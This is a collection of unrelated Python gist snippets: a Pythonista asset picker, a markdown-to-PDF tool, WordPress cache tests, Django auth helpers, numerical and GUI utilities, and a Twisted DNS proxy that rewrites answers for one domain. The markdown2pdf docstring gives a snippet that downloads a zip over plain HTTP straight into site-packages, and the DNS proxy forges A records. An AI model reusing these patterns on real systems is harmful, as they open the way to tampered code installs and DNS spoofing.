collectionView_cellForItemAtIndexPath_.encoding = '@32@0:8@16@24'
def collectionView_didSelectItemAtIndexPath_(_self, _cmd, _cv, _ip):
ds = ObjCInstance(_self)
ds.selected_asset_index = ObjCInstance(_ip).item()
ds.asset_collection_view.close()
collectionView_didSelectItemAtIndexPath_.encoding = 'v32@0:8@16@24'
methods = [collectionView_numberOfItemsInSection_, collectionView_cellForItemAtIndexPath_, collectionView_didSelectItemAtIndexPath_]
DataSource = create_objc_class('DataSource', methods=methods, protocols=['UICollectionViewDelegateFlowLayout', 'UICollectionViewDataSource', 'UICollectionViewDelegate'])
class AssetCollectionView (ui.View):
def __init__(self, *args, **kwargs):
ui.View.__init__(self, *args, **kwargs)
layout = UICollectionViewFlowLayout.alloc().init().autorelease()
layout.itemSize = CGSize(80, 80)
layout.sectionInset = UIEdgeInsets(8, 8, 8, 8)
frame = ((0, 0), (self.bounds.width, self.bounds.height))
cv = UICollectionView.alloc().initWithFrame_collectionViewLayout_(frame, layout)
cv.backgroundColor = UIColor.whiteColor()
cv.registerClass_forCellWithReuseIdentifier_(UICollectionViewCell, 'Cell')
ds = DataSource.alloc().init().autorelease()
res = PHAsset.fetchAssetsWithMediaType_options_(1, None)
ds.assets = [Asset(res.objectAtIndex_(i)) for i in xrange(res.count())]
ds.asset_collection_view = self
self.data_source = ds
cv.dataSource = ds
cv.delegate = ds
cv.setAlwaysBounceVertical_(True)
cv.setAutoresizingMask_(18)
ObjCInstance(self._objc_ptr).addSubview_(cv)
def pick_asset():
av = AssetCollectionView(frame=(0, 0, 540, 576))
av.name = 'All Photos'
av.present('sheet')
av.wait_modal()
if hasattr(av.data_source, 'selected_asset_index'):
asset = av.data_source.assets[av.data_source.selected_asset_index]
return asset
else:
return None
# Demo:
def main():
asset = pick_asset()
if asset:
img = asset.fetch_image()
img.show()
else:
print 'No image picked'
if __name__ == '__main__':
main()
```
#### File: hard-gists/0efb4d07f28af1c8fc1b/snippet.py
```python
html {
font-family: Arial, Helvetica, sans-serif;
font-size: 12pt;
}
\"""
markdown2pdf(text, 'test.pdf', css=DEFAULT_CSS)
See the [xhtml2pdf usage guide] [5] for more information on the supported CSS
properties and page layout directives.
Requirements
------------
The `markdown2pdf` module requires the following Python packages:
* [markdown2] [3] \*
* [html5lib](http://pypi.python.org/pypi/html5lib) \*
* PIL or [Pillow](http://python-pillow.github.io/) (optional) \*
* [PyPDF2](http://mstamy2.github.io/PyPDF2/) (optional)
* [ReportLab](http://reportlab.com)
* [xhtml2pdf] [4]
Packages marked with an asterisk are already included with Pythonista. All
these packages, except PIL / Pillow, are pure-Python code or the included
C extensions are optional (ReportLab).
Installation
------------
I have created a bundle of all the above libraries, which are not already
included in Pythonista, as a Zip archive. You have to extract this archive into
the `site-packages` sub-directory of your Pythonista document folder. You can
use the following code in the Pythonista console to download and extract the
Zip archive:
import os, requests, zipfile
ZIPFN = 'markdown2pdf.zip'
ZIPURL = 'http://chrisarndt.de/projects/markdown2pdf/' + ZIPFN
with open(ZIPFN, 'wb') as f:
f.write(requests.get(ZIPURL).content)
with zipfile.ZipFile(ZIPFN) as z:
z.extractall('site-packages')
os.unlink(ZIPFN)
You can also download a version of the above script, which also checks the
integrity of the downloaded Zip file, from this Gist:
[download_md2pdf.py](https://gist.github.com/SpotlightKid/9e03a7823827a1841b6b)
[1]: http://daringfireball.net
[2]: http://omz-software.com/pythonista
[3]: https://github.com/trentm/python-markdown2
[4]: http://www.xhtml2pdf.com
[5]: https://github.com/chrisglass/xhtml2pdf/blob/master/doc/usage.rst
"""
__author__ = '<NAME>'
__version__ = '1.1'
import argparse
import logging
import os
import sys
import tempfile
from os.path import basename, join, splitext
import console
import editor
from markdown2pdf import markdown2pdf
def make_pdf_filename(fn):
return splitext(basename(fn))[0] + '.pdf'
def main(args=None):
ap = argparse.ArgumentParser()
ap.add_argument('-c', '--current-file', action='store_true',
help='Use file currently opened in editor as input')
ap.add_argument('-e', '--edit-buffer', action='store_true',
help='Use content of current editor buffer as input')
ap.add_argument('infile', nargs='?', help='Input file name')
args = ap.parse_args(args if args is not None else sys.argv[1:])
if args.edit_buffer or args.current_file:
pdf_bn = make_pdf_filename(editor.get_path())
if args.current_file:
with open(editor.get_path()) as f:
md = f.read()
elif args.edit_buffer:
md = editor.get_text()
elif args.infile:
        pdf_bn = make_pdf_filename(args.infile)
with open(args.infile) as f:
md = f.read()
else:
pdf_bn = 'markdown2pdf.pdf'
try:
choice = console.alert('Markdown to PDF', '',
'Show README', 'Convert Clipboard', 'Convert URL')
except KeyboardInterrupt:
return
if choice == 1:
md = __doc__
elif choice == 2:
import clipboard
md = clipboard.get()
elif choice == 3:
import re
import clipboard
try:
cb = clipboard.get().strip()
if not re.search('^(ht|f)tps?://', cb):
cb = ''
url = console.input_alert('Enter URL', 'Download Markdown from URL:',
cb, 'Download')
except KeyboardInterrupt:
return
else:
import urllib2
import urlparse
try:
r = urllib2.urlopen(url)
except urllib2.URLError as exc:
print(exc)
console.hud_alert("Download error (see console)", 'error')
return
else:
md = r.read()
url = urlparse.urlparse(r.geturl())
fn = make_pdf_filename(url.path)
if fn:
pdf_bn = fn
if not md:
return
tempdir = tempfile.mkdtemp()
pdf_path = join(tempdir, pdf_bn)
console.show_activity()
status = markdown2pdf(md, pdf_path)
console.hide_activity()
try:
        choice = console.alert('Select Output', '',
'Save to file...', 'Open in...', 'View')
except KeyboardInterrupt:
return
if choice == 1:
try:
filename = console.input_alert("Filename",
"Enter PDF output filename\n(will overwrite existing files!):",
pdf_bn, 'Save')
os.rename(pdf_path, filename)
except KeyboardInterrupt:
return
except (IOError, OSError) as exc:
console.alert("Error", "Error writing PDF file:\n\n%s" % exc)
return 1
elif choice == 2:
console.open_in(pdf_path)
elif choice == 3:
console.quicklook(pdf_path)
try:
os.unlink(pdf_path)
os.rmdir(tempdir)
except: pass
if __name__ == '__main__':
logging.basicConfig(level=logging.ERROR)
main(sys.argv[1:])
```
#### File: hard-gists/0f87efc363309e99d600e3a6300fbcff/snippet.py
```python
from gimpfu import *
import time
import json
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
def add_layers(img, layer, classes):
gimp.context_push()
img.undo_group_start()
if img.base_type is RGB:
type = RGBA_IMAGE
else:
type = GRAYA_IMAGE
cl_list = json.loads(classes)
for c in cl_list:
layer = gimp.Layer(img, c,
layer.width, layer.height, type, 100, NORMAL_MODE)
layer.fill(TRANSPARENT_FILL)
img.insert_layer(layer)
img.undo_group_end()
gimp.context_pop()
register(
"python-fu-addlayer",
N_("Add layers stack"),
"Add layers",
"<NAME>",
"<NAME>",
"2017",
N_("_Add layers"),
"RGB*, GRAY*",
[
(PF_IMAGE, "image", "Input image", None),
(PF_DRAWABLE, "drawable", "Input drawable", None),
(PF_STRING, "classes", _("_Json list"), '["1","2","3","4","5","6","7","8","9"]'),
],
[],
add_layers,
menu="<Image>/Filters/Tools",
domain=("gimp20-python", gimp.locale_directory)
)
main()
```
#### File: hard-gists/10011921/snippet.py
```python
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
import webapp2
import jinja2
import httplib2
import os
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
autoescape=True,
extensions=['jinja2.ext.autoescape'])
# CLIENT_SECRETS, name of a file containing the OAuth 2.0 information for this
# application, including client_id and client_secret, which are found
# on the API Access tab on the Google APIs
# Console <http://code.google.com/apis/console>
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
<h1>Por favor configure OAuth 2.0</h1>
<p>
<code>%s</code>.
</p>
""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build("plus", "v1", http=http)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
class MainHandler(webapp2.RequestHandler):
@decorator.oauth_aware
def get(self):
variables = {
'url': decorator.authorize_url(),
'has_credentials': decorator.has_credentials()
}
template = JINJA_ENVIRONMENT.get_template('conceder.html')
self.response.write(template.render(variables))
class Social(webapp2.RequestHandler):
@decorator.oauth_required
def get(self):
try:
http = decorator.http()
user = service.people().get(userId='me').execute(http=http)
text = 'Hola, %s!' % user['displayName']
image = user['image']['url']
cover = user['cover']['coverPhoto']['url']
template = JINJA_ENVIRONMENT.get_template('bienvenido.html')
self.response.write(template.render({'text': text,
'image': image,
'cover': cover
}))
except client.AccessTokenRefreshError:
self.redirect('/')
application = webapp2.WSGIApplication(
[
('/', MainHandler),
('/social', Social),
(decorator.callback_path, decorator.callback_handler()),
],
debug=True)
```
#### File: hard-gists/1052286/snippet.py
```python
import cookielib
import json
import re
import random
import unittest
import requests
from wordpress_xmlrpc import Client, WordPressComment, WordPressPost
from wordpress_xmlrpc.methods.posts import EditPost, DeletePost, GetPost, NewPost
from wordpress_xmlrpc.methods.comments import EditComment, DeleteComment, NewComment
DOMAIN = 'chicagonow.dev'
USERNAME = 'admin'
PASSWORD = 'password'
TEST_BLOG = 'cta-tattler'
MAX_AGE_REGEX = re.compile(r'max-age\s*=\s*(\d+)')
def build_url(path):
"""
Construct an absolute url by appending a path to a domain.
"""
return 'http://%s%s' % (DOMAIN, path)
class TestCachingBase(unittest.TestCase):
"""
Base class Wordpress + Varnish TestCases.
Provides utils for login/logout and asserting hits/misses.
"""
def login(self):
"""
Login and return a cookie jar holding the login cookie.
"""
cookies = cookielib.CookieJar()
response = requests.post(
build_url('/wp-admin/admin-ajax.php'),
cookies=cookies,
data = {
'action': 'chicagonow',
'url': 'users/login',
'data': '{"user_email":"%s","user_pass":"%s"}' % (USERNAME, PASSWORD)
}
)
self.assertEqual(response.status_code, 200)
self.assertMiss(response)
return cookies
def logout(self, cookies):
"""
Logout and return a now-empty cookie jar.
"""
response = requests.post(
build_url('/wp-admin/admin-ajax.php'),
cookies=cookies,
data = {
'action': 'chicagonow',
'url': 'users/logout'
}
)
self.assertEqual(response.status_code, 200)
self.assertMiss(response)
        response_json = json.loads(response.text)
self.assertEqual(response_json['logged_out'], True)
return cookies
def get_xmlrpc(self, blog=None):
"""
Fetch an XML-RPC client for a given blog (or the root blog).
"""
if blog:
path = '/%s/xmlrpc.php' % blog
else:
path = '/xmlrpc.php'
return Client(build_url(path), USERNAME, PASSWORD)
def new_post(self, blog):
"""
Create a new post.
"""
xmlrpc = self.get_xmlrpc(blog)
post = WordPressPost()
post.title = 'New post from api'
post.description = 'New description'
return xmlrpc.call(NewPost(post, True))
def edit_post(self, blog, post_id):
"""
Edit a post.
"""
xmlrpc = self.get_xmlrpc(blog)
post = WordPressPost()
post.title = 'Edited post from api'
post.description = 'Edited description'
return xmlrpc.call(EditPost(post_id, post, True))
def delete_post(self, blog, post_id):
"""
Delete a post.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(DeletePost(post_id))
def get_post(self, blog, post_id):
"""
Fetch a post object.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(GetPost(post_id))
def new_comment(self, blog, post_id):
"""
Create a new comment.
"""
xmlrpc = self.get_xmlrpc(blog)
comment = WordPressComment()
comment.content = 'Test comment from api. (%s)' % str(random.random() * 99999999)
return xmlrpc.call(NewComment(post_id, comment))
def edit_comment(self, blog, comment_id):
"""
Edit a comment.
"""
xmlrpc = self.get_xmlrpc(blog)
comment = WordPressComment()
comment.content = 'Edited comment from api. (%s)' % str(random.random() * 99999999)
return xmlrpc.call(EditComment(comment_id, comment))
def delete_comment(self, blog, comment_id):
"""
Delete a comment.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(DeleteComment(comment_id))
def get_twice(self, url, **kwargs):
"""
Fetch a url twice and return the second response (for testing cache hits).
"""
requests.get(url, **kwargs)
response = requests.get(url, **kwargs)
return response
def assertHit(self, response):
"""
Assert that a given response contains the header indicating a cache hit.
"""
self.assertEqual(response.headers['X-Cache'], 'Hit')
def assertMiss(self, response):
"""
Assert that a given response contains the header indicating a cache miss.
"""
self.assertEqual(response.headers['X-Cache'], 'Miss')
def assertMaxAge(self, response, value):
"""
Assert that a given response contains the header indicating specific "max-age" value.
"""
try:
cache_control = response.headers['cache-control']
except KeyError:
try:
cache_control = response.headers['Cache-Control']
except:
raise AssertionError('No cache-control header.')
        max_age = MAX_AGE_REGEX.search(cache_control)
if not max_age:
raise AssertionError('No max-age specified in cache-control header.')
self.assertEqual(int(max_age.group(1)), value)
class TestLoggedIn(TestCachingBase):
"""
Tests for logged-in users.
"""
def setUp(self):
self.cookies = self.login()
def test_homepage(self):
url = build_url('/')
response = self.get_twice(url, cookies=self.cookies)
self.assertHit(response)
def test_post_preview(self):
url = build_url('/2400-north1200-west/?p=4&preview=true&url=preview/4')
response = requests.get(url, cookies=self.cookies)
self.assertMiss(response)
class TestLoggedOut(TestCachingBase):
"""
Tests for logged-out users.
"""
def test_homepage(self):
url = build_url('/')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 300)
def test_homepage_login_logout(self):
url = build_url('/')
cookies = self.login()
cookies = self.logout(cookies)
response = self.get_twice(url, cookies=cookies)
self.assertHit(response)
def test_search(self):
url = build_url('/search/')
response = self.get_twice(url, params={ 'blog_s': 'test' })
self.assertMiss(response)
def test_static_content(self):
url = build_url('/wp-content/themes/chicagonow/images/home-logo.png')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 604800)
def test_avatar(self):
url = build_url('/avatar/user-1-16.png')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 604800)
def test_ajax_users(self):
url = build_url('/wp-admin/admin-ajax.php')
data = {
'action': 'chicagonow',
'url': 'users',
'data': 'null'
}
response = self.get_twice(url, data=data)
self.assertMiss(response)
def test_ajax_comment_form(self):
url = build_url('/wp-admin/admin-ajax.php')
data = {
'action': 'commentform',
'data': '{ "post_id": 61 }'
}
response = self.get_twice(url, data=data)
self.assertMiss(response)
def test_new_post(self):
url = build_url('/%s/' % TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.new_post(TEST_BLOG)
response = requests.get(url)
self.assertMiss(response)
def test_edit_post(self):
url = build_url('/%s/' % TEST_BLOG)
post_id = self.new_post(TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.edit_post(TEST_BLOG, post_id)
response = requests.get(url)
self.assertMiss(response)
def test_delete_post(self):
url = build_url('/%s/' % TEST_BLOG)
post_id = self.new_post(TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.delete_post(TEST_BLOG, post_id)
response = requests.get(url)
self.assertMiss(response)
def test_preview_post(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
response = self.get_twice('%s?preview=true' % post.permalink)
self.assertMiss(response)
def test_new_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.new_comment(TEST_BLOG, post_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_edit_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
comment_id = self.new_comment(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.edit_comment(TEST_BLOG, comment_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_delete_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
comment_id = self.new_comment(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.delete_comment(TEST_BLOG, comment_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_new_comments_purge_too_much(self):
# Comments were incorrectly busting site root
post_id = self.new_post(TEST_BLOG)
url = build_url('/')
response = self.get_twice(url)
self.assertHit(response)
self.new_comment(TEST_BLOG, post_id)
response = requests.get(url)
self.assertHit(response)
if __name__ == '__main__':
unittest.main()
```
#### File: hard-gists/1088273/snippet.py
```python
from scipy.misc import imread, imsave
from scipy import mean, interp, ravel, array
from itertools import izip
import sys
def mkcurve(chan1,chan2):
"Calculate channel curve by averaging target values."
fst = lambda p: p[0]
snd = lambda p: p[1]
sums = {}
for v1, v2 in izip(ravel(chan1), ravel(chan2)):
old = sums.get(v1, [])
sums.update({v1: old + [v2]})
c = array( [ (src,mean(vals))
for src,vals in sorted(sums.iteritems()) ])
nvals = interp(range(256), c[:,0], c[:,1], 0, 255)
return dict(zip(range(256), nvals))
def correct_bad(good, bad):
"Match colors of the bad image to good image."
r, g, b = bad.transpose((2,0,1))
r2, g2, b2 = good.transpose((2,0,1))
rc = mkcurve(r,r2)
gc = mkcurve(g,g2)
bc = mkcurve(b,b2)
corr = bad.copy()
h, w = corr.shape[:2]
for row in xrange(h):
for col in xrange(w):
r,g,b = corr[row,col]
corr[row,col] = [rc[r], gc[g], bc[b]]
return corr
if __name__ == "__main__":
good, bad, saveas = sys.argv[1:1+3]
good = imread(good)
bad = imread(bad)
assert(good.shape == bad.shape)
corrected = correct_bad(good,bad)
imsave(saveas, corrected)
```
#### File: hard-gists/10a742de43246210f3ba/snippet.py
```python
import gensim
import codecs
from gensim.models import Word2Vec
import json
def export_to_file(path_to_model, output_file):
output = codecs.open(output_file, 'w' , 'utf-8')
model = Word2Vec.load_word2vec_format(path_to_model, binary=True)
vocab = model.vocab
for mid in vocab:
#print(model[mid])
print(mid)
vector = list()
for dimension in model[mid]:
vector.append(str(dimension))
#line = { "mid": mid, "vector": vector }
vector_str = ",".join(vector)
line = mid + "\t" + vector_str
#line = json.dumps(line)
output.write(line + "\n")
output.close()
```
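A minimal usage sketch for the exporter above; the model and output paths are hypothetical and should point at a local word2vec binary and the desired output file.
```python
# Hypothetical paths -- any word2vec binary in the C format will do.
export_to_file('GoogleNews-vectors-negative300.bin', 'word2vec_vectors.tsv')
```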
#### File: hard-gists/1118585/snippet.py
```python
from progress_ui import Ui_Dialog
from PyQt4 import QtCore, QtGui
import sys, time
class mythread(QtCore.QThread):
def __init__(self,parent,n):
QtCore.QThread.__init__(self,parent)
self.n=n
def run(self):
self.emit(QtCore.SIGNAL("total(PyQt_PyObject)"),self.n)
i=0
while (i<self.n):
if (time.time() % 1==0):
i+=1
#print str(i)
self.emit(QtCore.SIGNAL("update()"))
# create the dialog for zoom to point
class progress(QtGui.QDialog):
def __init__(self):
QtGui.QDialog.__init__(self)
# Set up the user interface from Designer.
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.ui.progressBar.setValue(0)
self.t=mythread(self,100)
QtCore.QObject.connect(self.t, QtCore.SIGNAL("total(PyQt_PyObject)"), self.total)
QtCore.QObject.connect(self.t, QtCore.SIGNAL("update()"), self.update)
self.n=0
self.t.start()
def update(self):
self.n+=1
print self.n
self.ui.progressBar.setValue(self.n)
def total(self,total):
self.ui.progressBar.setMaximum(total)
if __name__=="__main__":
app = QtGui.QApplication([])
c=progress()
c.show()
sys.exit(app.exec_())
```
#### File: hard-gists/11192605/snippet.py
```python
import numpy as np
from scipy.linalg import lu, inv
def gausselim(A,B):
"""
Solve Ax = B using Gaussian elimination and LU decomposition.
A = LU decompose A into lower and upper triangular matrices
LUx = B substitute into original equation for A
Let y = Ux and solve:
Ly = B --> y = (L^-1)B solve for y using "forward" substitution
Ux = y --> x = (U^-1)y solve for x using "backward" substitution
:param A: coefficients in Ax = B
:type A: numpy.ndarray of size (m, n)
:param B: dependent variable in Ax = B
:type B: numpy.ndarray of size (m, 1)
"""
# LU decomposition with pivot
pl, u = lu(A, permute_l=True)
# forward substitution to solve for Ly = B
y = np.zeros(B.size)
for m, b in enumerate(B.flatten()):
y[m] = b
# skip for loop if m == 0
if m:
for n in xrange(m):
y[m] -= y[n] * pl[m,n]
y[m] /= pl[m, m]
# backward substitution to solve for y = Ux
x = np.zeros(B.size)
lastidx = B.size - 1 # last index
for midx in xrange(B.size):
m = B.size - 1 - midx # backwards index
x[m] = y[m]
if midx:
for nidx in xrange(midx):
n = B.size - 1 - nidx
x[m] -= x[n] * u[m,n]
x[m] /= u[m, m]
return x
if __name__ == '__main__':
x = gausselim(np.array([[3, 2], [1, -4]]), np.array([[5], [10]]))
print x
```
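The docstring above walks through the forward/backward substitution; a quick way to sanity-check the result is to compare it against NumPy's direct solver (a sketch, assuming `gausselim` from the snippet above is in scope).
```python
import numpy as np

A = np.array([[3.0, 2.0], [1.0, -4.0]])
B = np.array([[5.0], [10.0]])
x = gausselim(A, B)
# Both solvers should agree to within floating-point tolerance.
assert np.allclose(x, np.linalg.solve(A, B).flatten())
```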
#### File: hard-gists/1125832/snippet.py
```python
import sys
from IPython.core.debugger import Pdb
from IPython.core import ipapi
def set_trace():
ip = ipapi.get()
def_colors = ip.colors
Pdb(def_colors).set_trace(sys._getframe().f_back)
def post_mortem(tb):
ip = ipapi.get()
def_colors = ip.colors
p = Pdb(def_colors)
p.reset()
while tb.tb_next is not None:
tb = tb.tb_next
p.interaction(tb.tb_frame, tb)
def pm():
post_mortem(sys.last_traceback)
```
#### File: hard-gists/11284662/snippet.py
```python
import select
import socket
import sys
import objc
from PyObjCTools import AppHelper
objc.loadBundle("CoreBluetooth", globals(),
bundle_path=objc.pathForFramework(u'/System/Library/Frameworks/IOBluetooth.framework/Versions/A/Frameworks/CoreBluetooth.framework'))
blebee_service = CBUUID.UUIDWithString_(u'EF080D8C-C3BE-41FF-BD3F-05A5F4795D7F')
blebee_rx = CBUUID.UUIDWithString_(u'A1E8F5B1-696B-4E4C-87C6-69DFE0B0093B')
blebee_tx = CBUUID.UUIDWithString_(u'1494440E-9A58-4CC0-81E4-DDEA7F74F623')
class RobotDelegate(object):
def __init__(self):
self.manager = None
self.peripheral = None
self.service = None
self.rx = None
self.tx = None
self.comms = None
def centralManagerDidUpdateState_(self, manager):
print repr(manager), "done it!"
self.manager = manager
manager.scanForPeripheralsWithServices_options_([blebee_service], None)
def centralManager_didDiscoverPeripheral_advertisementData_RSSI_(self, manager, peripheral, data, rssi):
self.peripheral = peripheral
manager.connectPeripheral_options_(peripheral, None)
def centralManager_didConnectPeripheral_(self, manager, peripheral):
print repr(peripheral)
self.peripheral.setDelegate_(self)
self.peripheral.discoverServices_([blebee_service])
def centralManager_didFailToConnectPeripheral_error_(self, manager, peripheral, error):
print repr(error)
def centralManager_didDisconnectPeripheral_error_(self, manager, peripheral, error):
print repr(error)
AppHelper.stopEventLoop()
def peripheral_didDiscoverServices_(self, peripheral, services):
self.service = self.peripheral.services()[0]
self.peripheral.discoverCharacteristics_forService_([blebee_rx, blebee_tx], self.service)
def peripheral_didDiscoverCharacteristicsForService_error_(self, peripheral, service, error):
print repr(service)
print repr(error)
for characteristic in self.service.characteristics():
if characteristic.UUID() == blebee_rx:
self.rx = characteristic
self.peripheral.setNotifyValue_forCharacteristic_(True, self.rx)
elif characteristic.UUID() == blebee_tx:
self.tx = characteristic
print repr(self.rx.UUID())
print repr(self.tx.UUID())
def peripheral_didWriteValueForCharacteristic_error_(self, peripheral, characteristic, error):
print repr(error)
def peripheral_didUpdateNotificationStateForCharacteristic_error_(self, peripheral, characteristic, error):
print "Receiving notifications"
def peripheral_didUpdateValueForCharacteristic_error_(self, peripheral, characteristic, error):
self.comms.send(characteristic.value().bytes().tobytes())
print repr(characteristic.value().bytes().tobytes())
def shutdown(self):
if self.peripheral is not None:
self.manager.cancelPeripheralConnection_(self.peripheral)
else:
AppHelper.stopEventLoop()
def send(self, byte):
byte = NSData.dataWithBytes_length_(byte, 1)
self.peripheral.writeValue_forCharacteristic_type_(byte, self.tx, 0)
class CommsManager(object):
def __init__(self, robot):
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener.bind(("127.0.0.1", 9999))
self.listener.listen(1)
self.connection = None
self.robot = robot
self.robot.comms = self
def loop(self):
endpoints = [sys.stdin, self.listener]
if self.connection is not None:
endpoints.append(self.connection)
r, w, e = select.select(endpoints, [], [], 0)
if sys.stdin in r:
delegate.shutdown()
return
if self.listener in r:
self.connection, _ = self.listener.accept()
if self.connection in r:
c = self.connection.recv(1)
if len(c) == 0:
print "closed"
self.connection.close()
self.connection = None
elif c not in ('\r', '\n'):
print repr(c)
self.robot.send(c)
AppHelper.callLater(0.1, self.loop)
def send(self, data):
while len(data):
sent = self.connection.send(data)
data = data[sent:]
delegate = RobotDelegate()
manager = CBCentralManager.alloc()
manager.initWithDelegate_queue_options_(delegate, None, None)
comms = CommsManager(delegate)
print repr(manager)
AppHelper.callLater(0.1, comms.loop)
AppHelper.runConsoleEventLoop()
```
#### File: hard-gists/1140136/snippet.py
```python
import urlparse
from django.contrib.auth import REDIRECT_FIELD_NAME, login
from django.contrib.auth.forms import AuthenticationForm
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.generic.edit import FormView
from django.conf import settings
class LoginView(FormView):
"""
This is a class based version of django.contrib.auth.views.login.
Usage:
in urls.py:
        url(r'^login/$',
            LoginView.as_view(
                form_class=MyCustomAuthFormClass,
                success_url='/my/custom/success/url/'),
            name="login"),
"""
form_class = AuthenticationForm
redirect_field_name = REDIRECT_FIELD_NAME
template_name = 'registration/login.html'
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, *args, **kwargs):
return super(LoginView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
"""
The user has provided valid credentials (this was checked in AuthenticationForm.is_valid()). So now we
can log him in.
"""
login(self.request, form.get_user())
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.success_url:
redirect_to = self.success_url
else:
redirect_to = self.request.REQUEST.get(self.redirect_field_name, '')
netloc = urlparse.urlparse(redirect_to)[1]
if not redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
# Security check -- don't allow redirection to a different host.
elif netloc and netloc != self.request.get_host():
redirect_to = settings.LOGIN_REDIRECT_URL
return redirect_to
def set_test_cookie(self):
self.request.session.set_test_cookie()
def check_and_delete_test_cookie(self):
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return True
return False
def get(self, request, *args, **kwargs):
"""
Same as django.views.generic.edit.ProcessFormView.get(), but adds test cookie stuff
"""
self.set_test_cookie()
return super(LoginView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
"""
Same as django.views.generic.edit.ProcessFormView.post(), but adds test cookie stuff
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
self.check_and_delete_test_cookie()
return self.form_valid(form)
else:
self.set_test_cookie()
return self.form_invalid(form)
```
#### File: hard-gists/1140516/snippet.py
```python
from django.contrib.auth.models import User, SiteProfileNotAvailable
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.signals import post_init
from django.dispatch.dispatcher import receiver
@receiver(post_init, sender=User)
def user_post_init(sender, instance, **kwargs):
def get_profile():
user = instance
if not hasattr(user, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MODULE in your project settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable('app_label and model_name should be separated by a dot in the AUTH_PROFILE_MODULE setting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable('Unable to load the profile model, check AUTH_PROFILE_MODULE in your project settings')
user._profile_cache, _ = model._default_manager.using(user._state.db).get_or_create(user=user)
user._profile_cache.user = user
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return user._profile_cache
instance.get_profile = get_profile
```
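A sketch of the configuration this signal handler expects; the app label and model name are hypothetical.
```python
# settings.py -- AUTH_PROFILE_MODULE uses the "app_label.ModelName" form checked above.
AUTH_PROFILE_MODULE = 'accounts.UserProfile'

# After the handler is registered, every User instance exposes get_profile(),
# which lazily creates the profile row via get_or_create on first access:
# profile = request.user.get_profile()
```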
#### File: hard-gists/11405336/snippet.py
```python
import sys
from gi.repository import Gtk
from gi.repository import Gio
from gi.repository import Granite
class Application(Gtk.Application):
def __init__(self):
Gtk.Application.__init__(self,
flags=Gio.ApplicationFlags.FLAGS_NONE)
self.license_type = Gtk.License.GPL_3_0
def do_activate(self):
self.window = Granite.WidgetsLightWindow.new("Tareas")
self.window.set_resizable(False)
self.window.set_keep_above(False)
self.window.set_position(Gtk.WindowPosition.CENTER)
self.window.set_size_request(350, 430)
welcome = Granite.WidgetsWelcome.new('No hay tareas', 'Excelente!')
self.window.add(welcome)
self.add_window(self.window)
self.window.show_all()
def do_startup(self):
Gtk.Application.do_startup(self)
def do_shutdown(self):
Gtk.Application.do_shutdown(self)
def on_quit(self, widget, data):
self.quit()
if __name__ == '__main__':
application = Application()
application.run(None)
```
#### File: hard-gists/1147973/snippet.py
```python
import socket
from twisted.internet.protocol import Factory, Protocol
from twisted.internet import reactor
from twisted.names import dns
from twisted.names import client, server
CHANGE = 'example.com'
TO = '127.0.0.1'
TTL = 60
class DNSServerFactory(server.DNSServerFactory):
def gotResolverResponse(self, (ans, auth, add), protocol, message, address):
qname = message.queries[0].name.name
if CHANGE in qname:
for answer in ans:
if answer.type != dns.A:
continue
if CHANGE not in answer.name.name:
continue
answer.payload.address = socket.inet_aton(TO)
answer.payload.ttl = TTL
args = (self, (ans, auth, add), protocol, message, address)
return server.DNSServerFactory.gotResolverResponse(*args)
verbosity = 0
resolver = client.Resolver(servers=[('192.168.127.12', 53)])
factory = DNSServerFactory(clients=[resolver], verbose=verbosity)
